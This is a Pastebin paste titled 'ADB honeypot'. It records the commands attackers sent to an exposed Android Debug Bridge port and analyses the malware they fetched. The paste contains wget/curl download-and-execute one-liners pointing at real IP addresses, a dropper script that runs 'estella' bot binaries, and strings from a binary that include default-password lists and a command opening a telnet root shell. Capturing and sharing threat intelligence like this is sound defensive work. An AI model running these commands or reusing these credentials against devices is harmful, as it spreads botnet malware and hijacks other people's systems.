API tools faq
paste
Advertisement
Guest User

ADB honeypot

a guest
Mar 7th, 2019
636
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.10 KB | None | 0 0
raw download clone embed print report
  1. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
  2.  
  3. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
  4.  
  5. shell:cd /data/local/tmp/; busybox wget http://185.61.138.13:8080/ adb; rm adb; wget http://185.61.138.13:8080/adb2 -O -> adb2; sh adb2; rm adb2; busybox curl http://185.61.138.13: sh adb3; rm adb3; curl http://185.61.138.13:8080/adb4 > adb4; sh adb4; rm adb4
  6.  
  7. ===================================================================================================================================================
  8.  
  9. $ curl "http://185.244.25.198/curl"
  10. cd /data/local/tmp
  11. rm -rf estella.*
  12. curl http://185.244.25.198/bins/estella.x86 > estella.x86
  13. chmod 777 estella.x86
  14. ./estella.x86 x86
  15. curl http://185.244.25.198/bins/estella.arm7 > estella.arm7
  16. chmod 777 estella.arm7
  17. ./estella.arm7 arm7
  18. rm -rf estella.*
  19.  
  20. $ curl http://185.244.25.198/bins/estella.x86 > estella.x86
  21.  
  22. 9074ef6baa836eb0fabec0a59c46d729 https://www.virustotal.com/#/file/66fe8f2c12b40e647120dad38af15130d3004f5568f6163917400cf3b5d64c29/detection
  23.  
  24. $ strings estella.x86
  25. ...
  26. ...
  27. 8.8.8.8
  28. host::estella
  29. password:
  30. pass word:
  31. username:
  32. user name:
  33. admin
  34. admin$
  35. invalid
  36. not valid
  37. /bin/busybox ESTELLA;
  38. exit;
  39. ldvr %s
  40. quit
  41. shell
  42. SCON
  43. PLSDIE
  44. STOP
  45. /bin/busybox
  46. fo39idkSx
  47. 185.244.25.198
  48. : applet not found
  49. CNXN
  50. OKAY
  51. CNXN
  52. host::estella
  53. OPEN
  54. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
  55. password:
  56. pass word:
  57. username:
  58. user name:
  59. not valid
  60. admin$
  61. admin
  62. I0TO5Wv9
  63. tlJwpbo6
  64. 6QNMIQGe
  65. 123456
  66. 12345
  67. aa888888
  68. 1234
  69. 888888
  70. 0000
  71. 1111
  72. 666666
  73. 654321
  74. 111111
  75. peak0429
  76. cd /var/tmp; echo -e "/bin/busybox telnetd -p9000 -l/bin/sh; /bin/busybox ESTELLA" > telneton; sh telneton;
  77. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!